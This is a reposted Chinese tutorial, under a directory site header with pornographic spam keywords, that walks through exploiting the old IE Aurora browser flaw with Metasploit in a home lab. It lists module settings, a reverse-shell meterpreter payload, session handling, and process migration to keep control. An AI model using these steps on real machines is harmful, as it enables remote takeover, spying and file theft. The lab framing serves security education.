日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

總是有人聽說,只要點了一條不明鏈接,電腦就被入侵了!這是不是危言聳聽呢?看完下面你就能夠明白如何實現(xiàn)了!更多網(wǎng)絡(luò)安全、Kali白帽滲透,可以前往下方專欄!

客戶端與服務(wù)端

服務(wù)端:比如數(shù)據(jù)庫、服務(wù)器、FTP服務(wù)器端、ssh等都是服務(wù)端程序,一定會在目標(biāo)系統(tǒng)中開啟某個端口用于服務(wù)通信。我們掃描這些端口背后的服務(wù),就是針對服務(wù)端的主動滲透!

客戶端:比如瀏覽器、PDF文檔閱讀器、音樂播放器、JAVA等!不會打開系統(tǒng)端口,我們無法主動發(fā)起攻擊,只能誘使目標(biāo)去點擊、打開、訪問一系列操作,比如點擊鏈接、打開文檔等行動來利用軟件本身的漏洞。這就是被動類型的客戶端攻擊!

瀏覽器客戶端漏洞

什么是aurora漏洞?

目標(biāo)的瀏覽器只要存在一些既定的漏洞,比如微軟著名的IE瀏覽器Aurora漏洞,只要目標(biāo)使用IE瀏覽器打開一些含有惡意代碼的鏈接,那么就會立即取得目標(biāo)電腦系統(tǒng)的權(quán)限,完成滲透侵入!這里僅僅用作技術(shù)安全演示,旨在教大家分辨網(wǎng)絡(luò)世界的不安全!

環(huán)境準(zhǔn)備:

我們需要使用kali自帶的滲透利用框架-matasploit?。?92.168.31.183)
之前搭建的XP系統(tǒng),自帶IE瀏覽器?。ú恍枰纈p)

實戰(zhàn)測試

在kali的終端下輸入:

msfconsole,開啟metasploit!
網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

在msf5下配置輸入:

use exploit/windows/browser/ms10_002_auraro
set SRVHOST 192.168.31.183
set SRVPORT 80
set URIPATH aurora
set payload windows/meterpreter/reverse_tcp
網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

SRVHOST:本地kali的服務(wù)器地址,kali的ip;
SRVPORT:本地kali被用于web訪問的端口,默認(rèn)設(shè)置成8080!如果設(shè)置成80,務(wù)必保證kali'的80的端口沒有被Apache2占用!
URIPATH:就是url網(wǎng)頁路徑地址,任意定義,這里寫成aurora,后面會以192.168.31.183/aura來展現(xiàn)!
set payload:不用多說,如果漏洞利用成功,發(fā)送過去控制目標(biāo)電腦的payload載荷!
set LHOST:載荷反彈回來指定的地址,就是kali的ip地址!
exploit:執(zhí)行攻擊
網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

上圖中【*】里的內(nèi)容,我們只關(guān)注:

using URL:http://192.168.31.183:80/aurora

注意:針對客戶端(瀏覽器)的攻擊,就是在kali端設(shè)置惡意代碼服務(wù)器,在目標(biāo)使用瀏覽器訪問我們生成的url鏈接后,就會觸發(fā)惡意代碼攻擊目標(biāo)瀏覽器,并發(fā)送payload過去控制目標(biāo)電腦!

電腦訪問觸發(fā)

我們這里僅僅模擬,如果對方在它的IE瀏覽器訪問了我們的鏈接:

http://192.168.31.183/aurora

我們的msf5就會收到偵聽,顯示了發(fā)送stage到目標(biāo)XP192.168.31.50中去,但是往往第一次不會建立meterpreter會話,也就說第一次攻擊不必成功,只會現(xiàn)實Sending stage!如下圖!

網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

此時,你還會發(fā)現(xiàn)對方的IE瀏覽器崩潰,那么你需要強(qiáng)制關(guān)閉瀏覽器并重啟瀏覽器!

當(dāng)目標(biāo)再次訪問該鏈接后,就會成功顯示meterpreter session 1 opened這樣的輸出,說明已經(jīng)建立控制會話,不過你還是看不到meterpreter> 怎么辦?

網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

不要慌,我們可以參考上圖,先輸入:

sessions(一定要出現(xiàn)meterpreter session 1 opened這樣的輸出才可以這樣做!)

然后根據(jù)輸出的會話ID號選擇,上圖顯示的會話是ID為1,那我們就輸入:

sessions 1

進(jìn)入之前已經(jīng)建立卻沒有彈出的會話!

網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

最后當(dāng)你看到meterpreter>這樣的輸出,表示成功完成滲透,這一次我們順利地進(jìn)行了針對瀏覽器漏洞的利用侵入!

怎樣遷移進(jìn)程?

至于得到了meterpreter會話,應(yīng)該不用問接下來怎么操作控制了,比如獲取截屏,實時查看桌面,錄音、開啟攝像頭、查看下載對方硬盤文件、遷移進(jìn)程,在@小白嘿客的《白帽黑客kali初學(xué)指南》專欄我們都教過,這里不再贅述!

不過我們重點來討論下如何進(jìn)行進(jìn)程遷移!

為什么要進(jìn)程遷移呢?當(dāng)目標(biāo)的瀏覽器崩潰了,或者異常退出,甚至是被使用者關(guān)閉了,那我們的meterpreter會話也會丟失,失去控制,因為meterpreter都是建立在對方內(nèi)存中的,關(guān)閉了進(jìn)程,就會失去控制!

這里可以使用一個“手動擋”的做法——在meterpreter會話下,輸入:

ps 查看下目標(biāo)進(jìn)程id和進(jìn)程詳細(xì)
網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

在里面尋找一個“explorer.exe的進(jìn)程”,如上圖,pid是4064。該進(jìn)程只有目標(biāo)系統(tǒng)重啟了,才會注銷,所以我們要及時將meterpreter會話和這個進(jìn)程進(jìn)行綁定!

繼續(xù)在meterpreter會話下輸入:

migrate 4064
網(wǎng)絡(luò)安全普及:為何一條不明鏈接,就能讓電腦換了主人?

 

此時就會完成綁定,即使目標(biāo)關(guān)閉了瀏覽器,我們也是照樣可以穩(wěn)穩(wěn)控制!

下節(jié)課,我們整個meterpreter會話的自動執(zhí)行腳本,實現(xiàn)目標(biāo)訪問鏈接,在建立meterpreter會話后自動轉(zhuǎn)移會話進(jìn)程,建立持久的滲透控制!

小白嘿客我想說

網(wǎng)絡(luò)安全關(guān)乎到每一個人,只有足夠的了解它,才能完全戰(zhàn)勝它!

分享到:
標(biāo)簽:網(wǎng)絡(luò)安全
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達(dá)人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定